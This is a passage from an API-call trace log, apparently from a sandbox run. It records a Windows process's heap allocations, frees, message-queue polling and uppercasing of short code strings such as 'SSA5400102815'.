wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0199.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.027] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.027] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0199.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.028] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.028] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.029] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.029] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0199.029] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0199.029] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.030] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.030] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.030] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.032] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.032] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.032] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0199.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0199.032] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.033] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.033] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0199.033] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.033] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.033] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0199.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.034] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.034] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.034] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.034] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0199.034] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0199.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0199.035] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0199.035] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0199.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0199.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.035] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0199.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0199.035] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0199.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0199.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0199.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0199.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.036] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.036] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0199.036] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.037] HeapFree (in: 